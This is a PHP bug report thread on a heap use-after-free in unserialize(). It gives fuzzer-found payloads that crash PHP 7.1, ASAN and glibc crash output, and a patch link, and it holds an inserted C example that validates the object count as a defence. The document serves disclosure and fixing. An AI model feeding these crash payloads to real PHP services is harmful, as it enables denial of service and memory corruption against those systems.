Sec Bug #74101 Unserialize Heap Use-After-Free (READ: 1) in zval_get_type
Submitted: 2017-02-15 10:53 UTC Modified: 2017-07-04 18:52 UTC
From: cyoung at tripwire dot com Assigned: ab
Status: Closed Package: *Data Exchange functions
PHP Version: 7.1.2RC1 OS: Linux (4.4.0-59-generic)
Private report: No CVE-ID:
 [2017-02-15 10:53 UTC] cyoung at tripwire dot com
Description:
------------
Using AFL + ASAN, I have uncovered a UAF read bug in unserialize within zval_get_type().

Apologies for the long test input, but minimizing it with AFL leads to a generic out of mem type condition.

Test script:
---------------
USE_ZEND_ALLOC=0 php -r 'unserialize("O:9:\"Exception\":799999999999999999999999999999999997:{i:0;a:0:{}i:6095700000000000000000062;i:1;i:0;R:2;i:0000000000000000000000000000000000000000000000000000000;R:2;i:10;a:0:{}i:62;i:1;i:0;R:2;i:000000000000000000000000000000000000002;d:031830001014370809133E+0000302;i:3;d:+.00000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:333000000000000000333333000000000101437080;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+33E+0000302;i:3;d:+.000000000000000033333300000000003333330007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:33333;d:+33E+0000302;i:3;d:+.00000000000000003333330000000000333333000000000101025170302;i:3;d:+.000000000000000033333300000000010143708091902809590217005;i:3;a:7:{i:3;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.00000000000009190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000001437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:33333;d:+33E+000030200000101437080919028095902517005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+33E+0000302;i:3;d:+.000000000000000033333300000000003333330007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902
517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:33333;d:+33E+0000302;i:3;d:+.00000000000000003333330000000000333333000000000101025170302;i:3;d:+.000000000000000033333300000000010143708091902809590217005;i:3;a:7:{i:3;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000070333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+00000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.00000000000000003333330000000001014005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014378809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000030217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000003333330000000001014370809133E+0000302;i:3;d:+.000000000000000033307005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+.0000000000003333330000000001014370809133E+0000302;i:3;d:+.00000000000000003333330000000001014370809190295902517005;i:3;d:3E+00003
02;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:33;d:3E+0000302;i:3;d:+33E+0000302;i:3;d:+.000000000000000033333300000000003333330007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.00000000000003333330000000000333333000000000101025170302;i:3;d:+.000000000000000033333300000000010143708091902809590217005;i:3;a:7:{i:3;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000070333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+00000010102517005;i:3;d:33000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.00005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i
:3;d:3E+000030217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000003333330000000001014370809133E+0000302;i:3;d:+.00000000000000003333330000000001014370809190295902517003E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.00000000000000003333330000000001014005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.00000000000000003333330000000000333333000000000101025170302;i:3;d:+.000000000000000033333300000000010143708091902809590217005;i:3;a:7:{i:3;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.000000000000000033333300000000010143703330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.00000000000000003333330000000000333333000000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000030217005;i:33;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217
005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+0000703333317005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000S00000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.00005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000030217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000003333330000000001014370809133E+0000302;i:3;d:+.00000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0080302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:33;d:3");'

Expected result:
----------------
Some errors should probably be printed about the unserialize data being invalid.

Actual result:
--------------
Without ASAN and with USE_ZEND_ALLOC=0, this is a segfault.
With ASAN and USE_ZEND_ALLOC=0, I get this report:
==15662==ERROR: AddressSanitizer: heap-use-after-free on address 0x61200000e548 at pc 0x000001346ae7 bp 0x7fff688a4a50 sp 0x7fff688a4a48
READ of size 1 at 0x61200000e548 thread T0
    #0 0x1346ae6 in zval_get_type /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_types.h:332:9
    #1 0x1346ae6 in php_var_unserialize_internal /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:637
    #2 0x13481ca in process_nested_data /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:452:8
    #3 0x13481ca in object_common2 /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:556
    #4 0x1345f03 in php_var_unserialize_internal /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:989:9
    #5 0x133e3ba in php_var_unserialize /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:584:11
    #6 0x130145e in zif_unserialize /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var.c:1114:7
    #7 0x1831ce2 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_vm_execute.h:675:2
    #8 0x16eeff5 in execute_ex /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_vm_execute.h:432:7
    #9 0x16efda6 in zend_execute /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_vm_execute.h:474:2
    #10 0x15519cd in zend_eval_stringl /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_execute_API.c:1093:4
    #11 0x1552343 in zend_eval_stringl_ex /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_execute_API.c:1134:11
    #12 0x1552343 in zend_eval_string_ex /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_execute_API.c:1145
    #13 0x193b0aa in do_cli /home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php_cli.c:1024:8
    #14 0x1938dd4 in main /home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php_cli.c:1381:18
    #15 0x7f3c83e0482f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #16 0x4809c8 in _start (/home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php+0x4809c8)

0x61200000e548 is located 264 bytes inside of 288-byte region [0x61200000e440,0x61200000e560)
freed by thread T0 here:
    #0 0x5076b2 in free (/home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php+0x5076b2)
    #1 0x14af197 in _efree /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_alloc.c:2428:4

previously allocated by thread T0 here:
    #0 0x507992 in __interceptor_malloc (/home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php+0x507992)
    #1 0x14b03ca in __zend_malloc /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_alloc.c:2820:14

SUMMARY: AddressSanitizer: heap-use-after-free /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_types.h:332 zval_get_type
Shadow bytes around the buggy address:
  0x0c247fff9c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff9c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff9c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff9c80: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c247fff9c90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c247fff9ca0: fd fd fd fd fd fd fd fd fd[fd]fd fd fa fa fa fa
  0x0c247fff9cb0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fff9cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fff9cd0: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
  0x0c247fff9ce0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fff9cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==15662==ABORTING

History

 [2017-02-15 18:50 UTC] cyoung at tripwire dot com
It looks like this can also be reproduced with a much more concise test case:
O:9:"Exception":799999999999999999999999999997:0i:0;a:0:{}i:2;i:0;i:0;R:2;

Also worth mentioning is that UBSAN produces this interesting line while processing the input:
ext/standard/var_unserializer.re:345:20: runtime error: signed integer overflow: 7999999999999999999 * 10 cannot be represented in type 'long'
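The UBSAN line above points at the root of the problem: the element count in the O:...: header is accumulated with an unchecked multiply, so a count like 799999999999999999999999999997 wraps instead of being rejected, and the parser then walks nested data with a count that bears no relation to the input. The following C program is an added example written for this page; it is not code from php-src, from nikic's patch, or from the reporter. It parses the header O:<len>:"<class>":<count>:{ the way a hardened parser should: the overflow test runs before the multiply (no undefined behaviour on any input), and a count that fits in a long but could not possibly be satisfied by the bytes left in the input is refused as well. The enum, the function names and the 6-byte-per-element bound are this example's own assumptions, not PHP's; the first payload is the reporter's minimized test case, the others are constructed here.

```c
#include <limits.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical status codes for this example. */
enum count_status {
    COUNT_OK = 0,
    COUNT_BAD_SYNTAX,  /* not an O: header, or a digit/quote/':'/'{' missing */
    COUNT_OVERFLOW,    /* the decimal count does not fit in a long */
    COUNT_TOO_LARGE    /* fits in a long, but exceeds what the remaining bytes can hold */
};

/* Smallest serialized property: key "i:0;" (4 bytes) + value "N;" (2 bytes).
 * This is the per-element bound the sanity check below assumes. */
#define MIN_ELEMENT_BYTES 6

/* Parse a non-negative decimal number terminated by ':'. On success *p is
 * advanced past the ':'. The overflow test runs before the multiply, so no
 * signed overflow can occur for any input; 799999999999999999999999999997
 * is refused at its 20th digit, exactly where UBSAN reported the wrap. */
static enum count_status parse_count(const char **p, const char *end, long *out)
{
    const char *s = *p;
    long v = 0;

    if (s >= end || *s < '0' || *s > '9')
        return COUNT_BAD_SYNTAX;
    while (s < end && *s >= '0' && *s <= '9') {
        int d = *s - '0';
        if (v > (LONG_MAX - d) / 10)   /* v * 10 + d would exceed LONG_MAX */
            return COUNT_OVERFLOW;
        v = v * 10 + d;
        s++;
    }
    if (s >= end || *s != ':')
        return COUNT_BAD_SYNTAX;
    *p = s + 1;
    *out = v;
    return COUNT_OK;
}

/* Validate O:<len>:"<class>":<count>:{ and return the declared property
 * count. Besides overflow, a count larger than remaining_bytes / 6 is
 * rejected: no input of that length can contain that many properties. */
static enum count_status check_object_header(const char *buf, size_t len, long *count_out)
{
    const char *p = buf, *end = buf + len;
    long name_len, count;
    enum count_status st;

    if (end - p < 2 || p[0] != 'O' || p[1] != ':')
        return COUNT_BAD_SYNTAX;
    p += 2;

    if ((st = parse_count(&p, end, &name_len)) != COUNT_OK)
        return st;
    /* need '"', name_len bytes of class name, '"', ':' */
    if (end - p < 3 || name_len > (end - p) - 3
        || p[0] != '"' || p[name_len + 1] != '"' || p[name_len + 2] != ':')
        return COUNT_BAD_SYNTAX;
    p += name_len + 3;

    if ((st = parse_count(&p, end, &count)) != COUNT_OK)
        return st;
    if (p >= end || *p != '{')
        return COUNT_BAD_SYNTAX;
    p++;

    if (count > (end - p) / MIN_ELEMENT_BYTES)
        return COUNT_TOO_LARGE;
    *count_out = count;
    return COUNT_OK;
}

/* Convenience wrappers so a caller can classify a NUL-terminated payload. */
static enum count_status classify_payload(const char *payload)
{
    long n;
    return check_object_header(payload, strlen(payload), &n);
}

static long declared_count(const char *payload)
{
    long n = -1;
    if (check_object_header(payload, strlen(payload), &n) != COUNT_OK)
        return -1;
    return n;
}

/* The reporter's minimized payload from this bug, plus constructed variants. */
static const char BUG74101_PAYLOAD[] =
    "O:9:\"Exception\":799999999999999999999999999997:0i:0;a:0:{}i:2;i:0;i:0;R:2;";
static const char CLAIMS_TOO_MANY[] = "O:9:\"Exception\":5:{i:0;N;}";
static const char WELL_FORMED[]     = "O:9:\"Exception\":1:{i:0;N;}";

int main(void)
{
    static const char *names[] = { "ok", "bad syntax", "overflow", "too large" };
    printf("bug payload:        %s\n", names[classify_payload(BUG74101_PAYLOAD)]);
    printf("count 5 in 7 bytes: %s\n", names[classify_payload(CLAIMS_TOO_MANY)]);
    printf("well formed:        %s (count %ld)\n",
           names[classify_payload(WELL_FORMED)], declared_count(WELL_FORMED));
    return 0;
}
```

The remaining-bytes bound is a cheap sanity check, not a proof that the body is well formed; its value is that a wildly wrong count is refused before any nested data is processed rather than after. From the application side the practical lesson is unchanged: a parser bug of this kind lives below unserialize()'s option handling, and allowed_classes changes which class gets instantiated, not how the count and the nested elements are parsed, so the only real mitigation is not to hand attacker-controlled strings to unserialize() at all.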
 [2017-02-15 20:03 UTC] cyoung at tripwire dot com
Another example of triggering this (or at least a similar) crash slightly differently and without instrumented builds of PHP (but still with USE_ZEND_ALLOC=0):
cyoung@Tyrell:~/unserialize/crash_analysis/out$ ~/php/php-src-php-7.1.2RC1/sapi/cli/php  -r 'var_dump(unserialize(base64_decode("Tzo5OiJFeGNlcHRpb24iOjc5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5Nzp7aTowO2E6MDp7fWk6NjA7ZDozMDAwMDAwMDAwNjE3MDAyOTU3OUUtMTE4O2k6MjtkOjAwMDMxO2k6MjtkOis5NTcxMzMzMzAwMEUtMDAwMDM1ODtpOjI7ZDo0OTU3MTExRS0wMDAwMzE4O2k6MDYyO2k6MTtpOjA7UjoyO2k6")));'
bool(false)
*** Error in `/home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php': munmap_chunk(): invalid pointer: 0x000000000235e350 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fb0035d97e5]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x1a8)[0x7fb0035e5ae8]
/home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php(php_request_shutdown+0x23f)[0x6ac22f]
/home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php[0x7b5dec]
/home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php[0x42b50c]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fb003582830]
/home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php(_start+0x29)[0x42b649]
======= Memory map: ========
00400000-00c70000 r-xp 00000000 fc:02 1837275                            /home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php
00e6f000-00ef4000 r--p 0086f000 fc:02 1837275                            /home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php
00ef4000-00f09000 rw-p 008f4000 fc:02 1837275                            /home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php
00f09000-00f27000 rw-p 00000000 00:00 0
02227000-02370000 rw-p 00000000 00:00 0                                  [heap]
7fb000d43000-7fb000d59000 r-xp 00000000 fc:00 549                        /lib/x86_64-linux-gnu/libgcc_s.so.1
7fb000d59000-7fb000f58000 ---p 00016000 fc:00 549                        /lib/x86_64-linux-gnu/libgcc_s.so.1
7fb000f58000-7fb000f59000 rw-p 00015000 fc:00 549                        /lib/x86_64-linux-gnu/libgcc_s.so.1
7fb000f59000-7fb0010cb000 r-xp 00000000 fc:00 4962                       /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
7fb0010cb000-7fb0012cb000 ---p 00172000 fc:00 4962                       /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
7fb0012cb000-7fb0012d5000 r--p 00172000 fc:00 4962                       /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
7fb0012d5000-7fb0012d7000 rw-p 0017c000 fc:00 4962                       /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
7fb0012d7000-7fb0012db000 rw-p 00000000 00:00 0
7fb0012db000-7fb002b91000 r-xp 00000000 fc:00 21478                      /usr/lib/x86_64-linux-gnu/libicudata.so.55.1
7fb002b91000-7fb002d90000 ---p 018b6000 fc:00 21478                      /usr/lib/x86_64-linux-gnu/libicudata.so.55.1
7fb002d90000-7fb002d91000 r--p 018b5000 fc:00 21478                      /usr/lib/x86_64-linux-gnu/libicudata.so.55.1
7fb002d91000-7fb002d92000 rw-p 018b6000 fc:00 21478                      /usr/lib/x86_64-linux-gnu/libicudata.so.55.1
7fb002d92000-7fb002db3000 r-xp 00000000 fc:00 563                        /lib/x86_64-linux-gnu/liblzma.so.5.0.0
7fb002db3000-7fb002fb2000 ---p 00021000 fc:00 563                        /lib/x86_64-linux-gnu/liblzma.so.5.0.0
7fb002fb2000-7fb002fb3000 r--p 00020000 fc:00 563                        /lib/x86_64-linux-gnu/liblzma.so.5.0.0
7fb002fb3000-7fb002fb4000 rw-p 00021000 fc:00 563                        /lib/x86_64-linux-gnu/liblzma.so.5.0.0
7fb002fb4000-7fb002fcd000 r-xp 00000000 fc:00 646                        /lib/x86_64-linux-gnu/libz.so.1.2.8
7fb002fcd000-7fb0031cc000 ---p 00019000 fc:00 646                        /lib/x86_64-linux-gnu/libz.so.1.2.8
7fb0031cc000-7fb0031cd000 r--p 00018000 fc:00 646                        /lib/x86_64-linux-gnu/libz.so.1.2.8
7fb0031cd000-7fb0031ce000 rw-p 00019000 fc:00 646                        /lib/x86_64-linux-gnu/libz.so.1.2.8
7fb0031ce000-7fb00334d000 r-xp 00000000 fc:00 21474                      /usr/lib/x86_64-linux-gnu/libicuuc.so.55.1
7fb00334d000-7fb00354d000 ---p 0017f000 fc:00 21474                      /usr/lib/x86_64-linux-gnu/libicuuc.so.55.1
7fb00354d000-7fb00355d000 r--p 0017f000 fc:00 21474                      /usr/lib/x86_64-linux-gnu/libicuuc.so.55.1
7fb00355d000-7fb00355e000 rw-p 0018f000 fc:00 21474                      /usr/lib/x86_64-linux-gnu/libicuuc.so.55.1
7fb00355e000-7fb003562000 rw-p 00000000 00:00 0
7fb003562000-7fb003721000 r-xp 00000000 fc:00 25684                      /lib/x86_64-linux-gnu/libc-2.23.so
7fb003721000-7fb003921000 ---p 001bf000 fc:00 25684                      /lib/x86_64-linux-gnu/libc-2.23.so
7fb003921000-7fb003925000 r--p 001bf000 fc:00 25684                      /lib/x86_64-linux-gnu/libc-2.23.so
7fb003925000-7fb003927000 rw-p 001c3000 fc:00 25684                      /lib/x86_64-linux-gnu/libc-2.23.so
7fb003927000-7fb00392b000 rw-p 00000000 00:00 0
7fb00392b000-7fb003ada000 r-xp 00000000 fc:00 21488                      /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.3
7fb003ada000-7fb003cda000 ---p 001af000 fc:00 21488                      /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.3
7fb003cda000-7fb003ce2000 r--p 001af000 fc:00 21488                      /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.3
7fb003ce2000-7fb003ce4000 rw-p 001b7000 fc:00 21488                      /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.3
7fb003ce4000-7fb003ce5000 rw-p 00000000 00:00 0
7fb003ce5000-7fb003ce8000 r-xp 00000000 fc:00 25683                      /lib/x86_64-linux-gnu/libdl-2.23.so
7fb003ce8000-7fb003ee7000 ---p 00003000 fc:00 25683                      /lib/x86_64-linux-gnu/libdl-2.23.so
7fb003ee7000-7fb003ee8000 r--p 00002000 fc:00 25683                      /lib/x86_64-linux-gnu/libdl-2.23.so
7fb003ee8000-7fb003ee9000 rw-p 00003000 fc:00 25683                      /lib/x86_64-linux-gnu/libdl-2.23.so
7fb003ee9000-7fb003ff1000 r-xp 00000000 fc:00 25691                      /lib/x86_64-linux-gnu/libm-2.23.so
7fb003ff1000-7fb0041f0000 ---p 00108000 fc:00 25691                      /lib/x86_64-linux-gnu/libm-2.23.so
7fb0041f0000-7fb0041f1000 r--p 00107000 fc:00 25691                      /lib/x86_64-linux-gnu/libm-2.23.so
7fb0041f1000-7fb0041f2000 rw-p 00108000 fc:00 25691                      /lib/x86_64-linux-gnu/libm-2.23.so
7fb0041f2000-7fb004209000 r-xp 00000000 fc:00 89638                      /lib/x86_64-linux-gnu/libresolv-2.23.so
7fb004209000-7fb004409000 ---p 00017000 fc:00 89638                      /lib/x86_64-linux-gnu/libresolv-2.23.so
7fb004409000-7fb00440a000 r--p 00017000 fc:00 89638                      /lib/x86_64-linux-gnu/libresolv-2.23.so
7fb00440a000-7fb00440b000 rw-p 00018000 fc:00 89638                      /lib/x86_64-linux-gnu/libresolv-2.23.so
7fb00440b000-7fb00440d000 rw-p 00000000 00:00 0
7fb00440d000-7fb004433000 r-xp 00000000 fc:00 25673                      /lib/x86_64-linux-gnu/ld-2.23.so
7fb004504000-7fb0045c9000 rw-p 00000000 00:00 0
7fb0045c9000-7fb004617000 r--p 00000000 fc:00 522423                     /usr/lib/locale/sd_IN@devanagari/LC_CTYPE
7fb004617000-7fb00461f000 rw-p 00000000 00:00 0
7fb004628000-7fb004629000 rw-p 00000000 00:00 0
7fb004629000-7fb004630000 r--s 00000000 fc:00 25518                      /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache
7fb004630000-7fb004632000 rw-p 00000000 00:00 0
7fb004632000-7fb004633000 r--p 00025000 fc:00 25673                      /lib/x86_64-linux-gnu/ld-2.23.so
7fb004633000-7fb004634000 rw-p 00026000 fc:00 25673                      /lib/x86_64-linux-gnu/ld-2.23.so
7fb004634000-7fb004635000 rw-p 00000000 00:00 0
7ffcbdd36000-7ffcbdd57000 rw-p 00000000 00:00 0                          [stack]
7ffcbddf8000-7ffcbddfa000 r--p 00000000 00:00 0                          [vvar]
7ffcbddfa000-7ffcbddfc000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
Aborted
 [2017-05-25 01:49 UTC] cyoung at tripwire dot com
Has anyone looked at this?  It is past the 90 mark and there are no comments on this bug except for my own.  A use-after-free accessible during unserialize() seems serious.
 [2017-06-25 19:01 UTC] nikic@php.net
-Assigned To: +Assigned To: ab
 [2017-06-25 19:01 UTC] nikic@php.net
Patch for this and the similar bug #74614: https://gist.github.com/nikic/2a3deba4e2f1e2f912a36f904160ca51

This is PHP 7 only, so assigning to ab for the release management.
 [2017-07-04 18:52 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2017-07-04 18:52 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
